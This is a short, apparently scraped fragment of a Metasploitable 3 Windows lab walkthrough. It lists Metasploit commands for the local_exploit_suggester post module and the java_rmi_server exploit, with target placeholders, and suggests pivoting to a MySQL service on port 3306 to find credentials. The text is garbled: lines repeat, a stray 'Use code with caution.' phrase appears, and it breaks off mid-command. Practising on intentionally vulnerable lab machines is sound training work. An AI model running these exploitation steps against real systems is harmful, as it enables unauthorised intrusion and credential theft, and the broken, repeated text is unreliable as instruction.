: Use the multi/recon/local_exploit_suggester in Metasploit.
Once inside, you can pivot to explore the databases. The service on port 3306 often contains sensitive credentials. metasploitable 3 windows walkthrough
use post/multi/recon/local_exploit_suggester set SESSION 1 run Use code with caution. : Use the multi/recon/local_exploit_suggester in Metasploit
use exploit/multi/misc/java_rmi_server set RHOST <Target_IP> set RPORT <High_Port_RMI> run set RPORT <